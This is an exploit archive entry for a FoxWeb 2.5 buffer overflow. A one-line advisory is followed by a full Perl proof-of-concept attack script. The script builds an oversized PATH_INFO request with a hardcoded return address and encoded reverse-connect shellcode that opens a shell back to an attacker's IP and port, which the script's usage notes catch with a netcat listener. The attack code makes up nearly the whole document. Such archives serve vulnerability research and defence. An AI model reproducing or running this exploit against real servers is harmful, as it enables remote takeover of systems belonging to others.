source: https://www.securityfocus.com/bid/8547/info FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software. #!/usr/bin/perl # # proof of concept foxweb 2.5 (http://www.foxweb.com) # by pokleyzz # # 06-27-2003 # # usage: # # nc -vv -l -p # ... # # ./bazooka_penaka.pl [foxweb.dll path] [ret] # # kau persis musang berbulu ayam .. # # Greet: # tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan. # # ---------------------------------------------------------------------------- # "TEH TARIK-WARE LICENSE" (Revision 1): # wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a "teh tarik" in return. # ---------------------------------------------------------------------------- # (Base on Poul-Henning Kamp Beerware) # use IO::Socket; my $host = "127.0.0.1"; my $port = 80; my $musang = "/scripts/foxweb.dll"; my $rawret = "77e127bd"; # user32.dll = 0x77e127bd win2k sp3 my $conn; my $ret; my $xip; my $xport; if ($#ARGV < 3){ print "[x] foxweb 2.5 exploit for windows \n\tby pokleyzz of d' scan clan \n\n"; print "Usage: \n bazooka_penaka.pl [foxweb.dll path] [ret]\n"; print "kau persis musang berbulu ayam ..\n"; exit; } $host = $ARGV[0]; $port = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; if ($ARGV[4]){ $musang = $ARGV[4]; } if ($ARGV[5]){ $rawret = $ARGV[5]; } ## start function sub string_to_ret { my $rawret = $_[0]; if (length($rawret) != 8){ print $rawret; die "[*] incorrect return address ...\n "; } else { $ret = chr(hex(substr($rawret, 6, 2))); $ret .= chr(hex(substr($rawret, 4, 2))); $ret .= chr(hex(substr($rawret, 2, 2))); $ret .= chr(hex(substr($rawret, 0, 2))); } } sub ip_to_shellcode { my $sip = $_[0]; split /\./,"$sip" ; @ar_ip = @_; if ($#ar_ip < 3) { die "[*] incorrect local ip ...\n "; } $xip = sprintf("%%%.2x%%%.2x%%%.2x%%%.2x" ,int($ar_ip[0]) ^ 0x96 ,int($ar_ip[1]) ^ 0x96 ,int($ar_ip[2]) ^ 0x96 ,int($ar_ip[3]) ^ 0x96 ); } sub port_to_shellcode { my $sport = int($_[0]); if ($sport > 65535 ) { die "[*] incorrect port number ...\n "; } $xport = sprintf("%%%.2x%%%.2x" ,($sport >> 0x08) ^ 0x96,($sport & 0x0000000ff) ^ 0x96); } ## end function # reverse connect shellcode by sk $shellcode = "" ."%EB%02%EB%05%E8%F9%FF%FF%FF%58%83%C0%1B%8D%A0%01" ."%FC%FF%FF%83%E4%FC%8B%EC%33%C9%66%B9%5C%01%80%30" ."%96%40%E2%FA%7E%F6%96%96%96%D1%F3%E2%C6%E4%F9%F5" ."%D7%F2%F2%E4%F3%E5%E5%96%DA%F9%F7%F2%DA%FF%F4%E4" ."%F7%E4%EF%D7%96%D5%E4%F3%F7%E2%F3%C6%E4%F9%F5%F3" ."%E5%E5%D7%96%D3%EE%FF%E2%C6%E4%F9%F5%F3%E5%E5%96" ."%E1%E5%A4%C9%A5%A4%96%C1%C5%D7%C5%E2%F7%E4%E2%E3" ."%E6%96%C1%C5%D7%C5%F9%F5%FD%F3%E2%D7%96%F5%F9%F8" ."%F8%F3%F5%E2%96%F5%FB%F2%96%CC%C4%2D%96%96%66%E1" ."%17%AD%DB%CC%06%96%E2%95%DD%7D%63%1D%E5%AA%95%65" ."%1D%E0%EE%95%65%1D%E8%B6%95%6D%1D%D8%82%C0%A5%56" ."%C1%C7%1D%A9%95%6D%1D%64%A5%5F%27%98%65%30%CF%C9" ."%E2%90%15%51%92%D6%74%7E%C8%1D%C0%B2%95%45%47%76" ."%95%54%A5%5F%F0%1D%9E%1D%D0%8A%95%55%57%77%94%95" ."%57%1D%86%95%45%C8%1D%68%A5%5F%27%95%7E%EA%96%96" ."%96%15%50%9A%C4%C0%69%C1%62%CC%1D%4E%A5%5F%27%95" ."%7E%FE%96%96%96%15%50%9E%C3%FE%97%97%96%96%69%C1" ."%62%A5%56%C6%C6%C6%C6%D6%C6%D6%C6%69%C1%6E%1D%4E" ."%F0%51%D3%96%94%96%F0%51%D3%94" ."PORT" # 2 char ."%51%D3%92" ."IP" # 4 char ."%FC%86%C3%C5%69%C1%6A%A5%5F%27%87%C1%1D" ."%6B%65%3D%C9%50%D3%96%D2%1F%CB%AA%1F%CB%AE%1F%CB" ."%D6%F0%51%D3%BA%97%97%1B%D3%D2%C6%C3%C7%C7%C7%D7" ."%C7%DF%C7%C7%C0%C7%69%C1%7A%C6%69%C1%66%1C%90%D0" ."%12%56%E3%6F%C7%C4%C0%C5%69%44%CC%CF%3D%74%78%55"; # port c6 96 = 0x5000 ^ 0x9696 # 96 c6 # ip BF 97 3E 56 = 192.168.1.41 ^ 0x96969696 # 56 3E 97 BF # 127.0.0.1 = 7f000001 #$xip = "%56%3E%96%82"; # 192.168.0.20 &ip_to_shellcode($myip); &port_to_shellcode($myport); #$xip = "%82%96%"; #$xport = "%07%06"; #9090 $shellcode =~ s/IP/$xip/; $shellcode =~ s/PORT/$xport/; &string_to_ret($rawret); $buffer .= "A" x 1671; $buffer .= "\xeb\x0c\xeb\x0c"; # jmp short 0x0c $buffer .= $ret; $buffer .= "B" x 16; $buffer .= $shellcode; $request = "" ."GET $musang/$buffer HTTP/1.1\n" ."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n" ."Host: $host:$port\n" ."Connection: Close\n\n"; print "[x] Connect to $host on port $port ...\n"; $conn = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "[*] Can't connect to $host on port $port ...\n"; $conn-> autoflush(1); print "[x] Sending exploit code ...\n"; print $conn $request; print "[x] Exploit sent .. good luck :) ...\n"; #print $request;